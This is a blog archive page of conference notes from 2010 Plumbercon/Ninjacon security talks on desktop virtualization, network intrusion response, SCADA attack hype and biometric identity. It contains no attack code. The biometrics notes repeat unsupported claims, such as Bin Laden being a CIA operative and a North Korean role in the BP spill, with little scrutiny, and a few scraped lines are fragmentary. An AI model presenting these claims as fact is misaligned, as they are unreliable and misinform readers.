Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: ninjacon

[Plumbercon/Ninjacon] Security in a changing world

Security in a changing world – bringing security-sense to virtualized desktop environments

Dror-John Roecher


Server virtualization has become commonplace and even security has picked up on the subject and established a common understanding of good security practice for virtualized server environments. But a new virtualization trend rises above the horizon – so called ‘Client’ or ‘Desktop’ virtualization. Whereas the scope of server virtualization was limited to the datacenter (and in some context stretched towards the location and ownership of the datacenters, e.g. in the context of cloud-based services), these new client computing approaches easily cross all existent logical and geographical boundaries within our computing environment. They enable a whole set of new services and delivery methods, flexibility in time, location, underlying hardware, operating system and presentation format. All these changes need to be addressed and constructively accompanied by security.

The presentation will detail concepts of client/desktop virtualization for security people, enabling them to understand what the technology does, how it does it and why businesses rush to introduce it. We will go on to discuss security of different solution architectures and establish some basic guidelines on choosing ‘the right stuff for the situation’. These two parts of the presentation serve as a foundation for an abstracted discussion on how to tackle the big changes from a security perspective. How is security changing, what are we doing wrong, what are we doing right and how should we change the way we look at and apply security. Let’s call this ‘change the spirit of security’.

Where does corporate IT stand today

Our wish is to use products in a secure way, align business and IT objectives and have this all transparent to the end-user, compliant, etc….

The reality however is very different. Many security staff see security as a value in itself. They have no link to business functions and no understanding of business needs.

Broken products, run by people without proper skill-sets, overburdened with too many tasks

Clinging to the “never change a running system” paradigm – common excuse to never change, move or think and evolve

Computer budgets are out of control – value of security is not evident

CxO on IT:

  • Cheap to buy and operate
  • Needed for business, but no value in itself
  • Should be easily exchangeable
  • OPEX, not CAPEX

Users on IT:

  • Corporate-provided tools often unfit for the job
  • Wish for “freedom of tools”, “freedom of time and location”
  • Cisco Strategy: “Anytime, Anywhere, Anydevice, Anyapp, Anydata…” moving towards collaboration

Client Virtualization 101

5 technologies at least…

  • Local OS Virtualization
    • Have your local OS Virtualized
  • Remote OS Virtualization
    • Move the Virtualized Guest to the DataCenter
  • Application Virtualization
    • Package sandboxed applications and remove the need for local installs
    • Restrict access from the application to the OS
    • Example. Microsoft Office 2010 – Click and run version
  • User Profile Virtualization
    • Decouple all users settings from the OS
    • Allows users to easily move between systems and maintain the same environment
  • Presentation Virtualization
    • Run everything remotely and provide access to the remote user
    • example: Citrix

Remote OS Virtualization

Pros & Cons

  • + Clients are always accessible for IT-Staff
  • + Performance on demand
  • – Storage needs

Security architecture depends on the protocol used (PCoIP, RDP, RGS)

Threats and Vulnerabilities –> Difficult and complex due to the architecture. Outcome is questionable

Vendors are quick to respond that their solutions are secure, however even they fail to understand the true risks present (example, use of SSL without knowing who validates who… client, server, both?)

Adapt to a changing world

Risk has failed us – We are used to trust

Risk Analysis has mostly failed –> even in finance where they have a lot of statistical information

  • The question boils down to: do you trust the technology? The provider? The source of the information?

Our security concepts are based on location. With Client Virtualization, the clients are in motion. This creates a new set of problems!

Replace location-based security with content-based security

Replace prohibition with enablement

  • Blocking access to things like Skype, ICQ, doesn’t help the problem
  • Enable employees to use them in a secure way and within the company policies

Replace band-aids with root-cause treatment

  • Many systems, such as Application Firewalls, NAC, etc.. are band-aid solutions
  • Implement long-term solutions such as Secure Application Development, Innate data integrity, …

Fight operational stupidity

  • Single employee responsible for high-end, high-cost systems
  • Separation of duties… A and B must check…. A is holiday standing for B and vice versa !

Less is more – Focus on the basics and do this right! –> don’t build the Winchester House of Security!

Accept that business will always break security

  • If there’s a good business reason, the business will do it regardless of security
    • Security can’t say no…. provide solutions

Start embracing change

  • Change is a chance
  • Embrace change, by starting to change your mind-set about change

Links :

eport: Cyber Attacks Caused Power Outages in Brazil

  • Plumbercon/Ninjacon Synopsis –> http://plumbercon.org/schedule/58
  • [Plumbercon/Ninjacon] Invasion!


    Fish AKA Barry van Kampen


    It is 04:30 AM, you are awakened by a text message, and your friendly IDS is telling you a bunch of disallowed systems are trying to connect to the internet. Within a few seconds you’re awake, adrenaline pumping through your body; the disallowed connections aren’t usual warnings like the truckload of false positives you handled yesterday. Apparently, the alerts were not so ‘false’ after all. It’s going to be a long, long day…

    Intrusion is one of the first phases in the so-called network invasion, this story tells you about what could happen after the first intrusion, what you could do, and what you shouldn’t do.

    —- —- —- —- —-

    Everywhere you go there are hacks, and everybody gets hacked eventually.

    Invasion is a step beyond being hacked.

    The information your company holds could be stolen and sold.

    WTF is network Invasion?

    Who’s invading

    • Hackers & crackers (hackers aren’t the bad guys)
    • Organized crime
    • People who can make money from it

    How to get invaded

    • Hack is being made
    • A first system is being owned
    • Level 2 attack
      • Further exploitation
    • Hack into the inner network
    • Setup communications
      • To transport information out
    • Maintain access
      • Wait for the good info, sell it, use it, …

    Ways to get invaded

    • Zero days
    • Targeted attacks
    • Printers
      • Multi-function devices
    • Insecure wireless
    • Wardialing – Modem access
    • Custom/Prepped Hardware
      • Certified pre-owned

    Not all attacks have to be bleeding edge or highly technical… old modem attacks, physical access, and social engineering do it just as well.

    Maintaining access –> custom or purpose written malware/trojans. Custom written code is worth the investment if an attacker can make money from the attack.


    • Patch Management / LCM
    • Faulty code
      • Application vulnerabilities
      • SQLinjection etc…
    • Human Error
      • Configuration issues
    • Response
      • IDS False Positives
      • Real attacks can get lost in amongst a flood of False Positives
    • It can start at home!
      • Password stealing
      • See recent Facebook attack


    • Strange patterns
      • Many companies have logs and monitoring, but fail to do full analysis
      • Not much trend analysis
    • System Maintenance
      • Log checking –> People don’t check their logs enough
      • SSH brute-force on your external IP is to be expected
      • SSH brute-force on your internal network is bad!
    • IDSs are providing alerts
      • Mixed amongst other false positives

    Incident Response

    Gathering information from different sources can be a problem. Communication is key, but you don’t know which communication channels are still secure.

    If the team is too large, maybe somebody in the loop, is also involved with the attack. Keep things need to know. Give heads up to other teams, but don’t provide more information than is required to achieve the task.

    What to do?

    Response based actions

    • Find the source and method of attack, monitor, block, fix
      • Check network traffic
      • Use Anti-malware software
        • Can’t help against custom attacks
      • Apply software control
        • White-lists
        • Information flows

    The Big Search

    • Search for changes on the network
      • Check file systems
      • File integrity
        • Must have hashes of known good files
        • Do comparison using trusted binary
      • Blacklist checks
      • Whitelist checks

    Full Reinstall

    • Reinstall it all!
      • Not practical
    • Risk reduction
    • Have to be sure you solved the issue
      • Is the invasion gone
      • Is the flaw fixed

    Be pro-active = being prepared

    Incident response policy should be in place

    • A team with guru’s
    • Mandate to do what is required
    • External contracts / contacts
      • Ability and permission to reach out to trusted 3rd parties
    • IR is the first part of forensics
    • Legal!
      • Be sure of legal issues
      • Speak to legal department if you have one

    To be more pro-active

    • Vuln assessments and audits
    • Check and double check patch management
    • Change management
    • Monitoring and followup

    Improve architecture to reduce risk

    • Multiple firewalls, from different vendors
    • IDS monitoring
    • WAF
    • Monitoring of load on servers and networks

    Goal here is to make it hard to get through to the soft core.


    A good source of information on who’s attacking you, but not legal in all countries (can be seen as tempting attackers).

    Links :

    eport: Cyber Attacks Caused Power Outages in Brazil

    [Plumbercon/Ninjacon] Breaking news: Cyber attack started Eyjafjallajökull volcano eruption

    Breaking news: Cyber attack started Eyjafjallajökull volcano eruption

    Anchises de Paula


    ‘We know that cyber intruders have probed SCADA systems, and that in other countries cyber attacks have started volcano eruptions. Several prominent intelligence sources confirmed that a cyber attack in Iceland in April 2010 affected several European countries and hundreds of thousands of people. The Icelandic Meteorological Office had several plants knocked offline, which indicates that the cyber incident is connected to the explosive activity from the Eyjafjallajökull volcano. It is not clear who did it or what the motive was.’

    Calm down, the story above is not true, as far as I know. Actually, I just created it by copying and pasting text from a major US news program’s story on cyber war and system sabotage. There is a lot of FUD, paranoia and an obscure political agenda behind the recent news about hackers’ capabilities to attack SCADA Systems and disrupt critical infrastructures. Are hackers able to blackout a country, to destroy an oil platform, to disrupt Wall Street, or to lead a volcano to eruption?

    We have seen plenty of rumors about cyber attacks against the nation’s critical infrastructures, including security vulnerabilities in the power grid control systems (the ones that run dams, power plants, transmission lines and more). Some security professionals are highly skeptical about the claims, raising questions about the veracity of the penetration of industrial systems by criminals, while several sources from the government and the industry keep mentioning this story, over and over.

    In this presentation, Anchises will discuss the misinformation, disinformation and myths that support such cyber Armageddon theories and stories. He will elaborate on the technical feasibility of such threats, the political agenda and the press agencies’ trustworthiness. In addition, he will present a review of the press stories about SCADA attacks and discuss the real feasibility of them. Are these stories real, lies, or exaggeration? What is the likelihood of each of them? The truth is out there and we will find it.

    <FUD>Volcano Hacking</FUD>

    The press are also hot for stories of SCADA or cyber attacks currently, that the press would almost accept anything as a cyber attack.

    The Volcano eruption would be a perfect terrorist attack. Disruption, Cost, Fear.

    How could you achieve this….

    Simple, sensors that monitor volcanos are network connected. Attacking these to show false readings, cause pulses, etc..

    STOP –> This is stupid… it’s FUD

    Some people believe these things are possible  however –> US Military behind Haiti quake, says Innsbruck scientist (see links)

    60 Minutes also discussed the Brazilian Blackouts in 2005/7 were caused by hackers. It was later found that sooty insulators caused the blackouts… not hackers. Then again, sooty insulators don’t make news!

    Many SCADA systems are old, just like the systems in Brazil. Naturally things go wrong, and when they fail, people start to think it’s hackers instead of looking at the obvious first.

    News even surfaced that the BP disaster could be a Cyber Attack (see links)

    Other information points to faulty sensors (deactivated and not replaced)

    People believe anything the press say…

    • Few reports with technology background
    • The press want to sell newspapers/viewers
    • Press Hype threats… more interesting than other stories

    Cyber Armageddon stories

    Fact: SCADA systems are vulnerable

    • Software, hardware, architecture
      • Old technologies: old bugs
      • New technologies: TCP/IP Internet

    Bad combination! Old bugs, easily accessible!

    Airgaps are disappearing as SCADA needs to send data to other systems

    Tools for testing SCADA

    • ModScan –> SCADA MODBUS Network Scanner
    • SHODAN

    SCADA incidents

    1999: Russia – Malicious crackers took control of a gas pipeline

    2001: Australia – A disgruntled ex-employee hacked into the water control system and caused millions of liters of raw sewage to spill out

    2003: US – Slammer worm affected the corporate network at a nuclear plant and disabled a safety monitoring system

    2007: US – Aurora Generator Test –> Test in a controlled environment

    2007: US – Operators manually shut down a nuclear reactor after two water pumps’ controllers locked up following a spike in data traffic

    2008: Ireland – SCADA system at Dublin Port Tunnel collapsed

    2009: US – Human error shutting down cooling system

    2009: US – an IT consultant tampered with a SCADA system  from an oil and gas corporation

    2010: US – Computer failure interrupts flow from a city plant

    Perfect FUD

    Press are over-hyping things

    It’s not possible to prove/dis-prove. Therefore it could be blamed on anybody from hackers, to cyber attacks from foreign nations.

    Before the press started talking about SCADA, nobody was looking at them. Since then, hackers are looking for them and researchers are testing them.

    Self for-filling prophecy?


    Response from a Journalist: Press are starved of real technical assistance. Most news stories come from press-releases and are hard to double-check. A lot of press do simple copy & paste from AP articles. Deadlines restrict what a journalist can really do to confirm things, especially with highly technical content.

    Response from Anchises de Paula: Press is no longer a one-way process. Readers can feedback to the journalists. However, if people see enough of a story, it becomes true. Journalists cite other journalists as sources. Journalists often have a story, and even when talking to a technical source, they pick and choose the one line quotes to make their point, and not convey the whole story.

    Links :

    • Plumbercon/Ninjacon Synopsis –> http://plumbercon.org/schedule/51
    • Anchises de Paula Twitter –> http://twitter.com/anchisesbr
    • Haiti earthquake conspiracy –> LINK
    • US Military behind Haiti quake, says Innsbruck scientist –> LINK
    • Report: Cyber Attacks Caused Power Outages in Brazil –> LINK
    • Brazilian Blackout Traced to Sooty Insulators, Not Hackers –> LINK
    • Oil Spill, Acident or Cyber Attack –> LINK
    • ModScan: A SCADA MODBUS Network Scanner –> LINK

    Report: Cyber Attacks Caused Power Outages in Brazil

    [Plumbercon/Ninjacon] Biometrics, the weapon for the ‘New War’

    Biometrics, the weapon for the ‘New War’

    Mark Tuttle


    In February 2010, the DNI (director of National Intelligence) presented the annual ‘National Threat Assessment’ report to Congress. Cyber threats are number one this year, displacing the dominance of terrorism. Creating a war against something of concern is nothing new – we have had other wars, wars on drugs, wars on terror that arguably didn’t require a war effort, but it is the way to build a large momentum against a treat – imagined or real. Cyber crime and the cyber threat to national online infrastructure is the new war. This ‘war’ will yield major amounts of money to secure the Internet, and the critical connected infrastructure. It also will likely not truly solve the core problem with all systems, the lack of strong identity.

    When the authorities and bureaucrats realize that strong identity is at the core of many problems, we can look forward to the government creating a national strong identity platform initiative. If we are lucky, it will be pretty good, if we are not, it will mean a complex system that no doubt will impinge on our personal privacy and rights. One thing is clear though: that biometrics will be at the center of the system. President Obama has created a Cyber Security CZAR position to address this problem, a chief technology officer for the Internet, and he has activated programs for research, development and deployment of new technologies to address the problems. Some estimates puts spending at 5 Billion USD per year to solve this problem.

    In this presentation, we will examine the change in awareness, look at the current state of biometrics, and cover a new architectural paper on securing transactions over an insecure Internet; delivered by Dr. Michael Fiske to the DOD and NSA (IMPC 2009 Miami) addressing this topic. On a lighter note, Mark will also cover Dr. Lee Haddad’s paper on the reported Gummy Bear attack against biometric finger print security systems.

    Whats the new war ?

    DNI – 2010 Annual Threat Report

    – Initial 2.5 pages discuss critical infrastructure protections (Cyber threats)

    This is a break from the norm, where the key focus and initial discussion has been on domestic Terrorism.

    Professor Leo Strauss said :

    • America will disintegrate into ruin because of individual self interests
    • America needs to have a special place in the world… the protector of the freedom to make right the wrongs – in order to prevent this
    • Because of this need: it is ok to exaggerate or create an enemy if one is not actually present

    Critical infrastructure – Cyber attack is a real enemy and perhaps ex CIA operative Osama Bin Laden and his Terrorism is not… (source, “The power of Nightmares” BBC Adam Curtis

    Critical infrastructure – SCADA

    • Acknowledged compromises (many on Google)Nuclear power plan safety system –> down for 5 hours
    • Pipeline –> Leading to release of materials
    • Oil Platform –> disgruntled employee

    BP Oil Spill

    Accident or Cyber Attack?

    • Article alludes to North Korea being behind the attack (circumstantially)
    • Deepwater Horizon oil platform was built and financed by South Korea

    Lack of integrity and protection in SCADA leaves them open to attack. Very little hard evidence is present due to the Oil Rigg being destroyed.

    Weak Identity and Compromise

    Do most identity systems confirm the actual user –> No

    PKI cards only identify the card, there’s no direct log leading back to the user. Gap in the identity chain.


    Top 10 requirements to solve these issues (coming from IPMC 2009 talk by Dr. Michael Fiske)

    The host computer and network cannot be trusted. The ecosystem must be divided into trusted and untrusted parts An operation not run in a trusted environment must be handled as a secure transaction. Authentication and authentication from an untrusted device is not secure.

    A new notion, a secure module is required. Given that the host network cannot be trusted, it follows that something new needs to be used.

    This new module must focus on :

    • Availability
    • Authentication
    • Integrity
    • Confidentiality
    • Authorization
    • Accountability

    Authentication must be decentralized while authorization operations must be centralized.

    All authentication data must be stored only in the secure module. If the  module is tampered with, the contents should be destroyed to protect integrity.

    All authentication factors (PIN, Password, Biometrics) have to be entered directly into the module. The only output is a dynamic token in the form of a one-time-passcode.

    Module Demonstration –> demo of a working module (at 17:00)

    Links :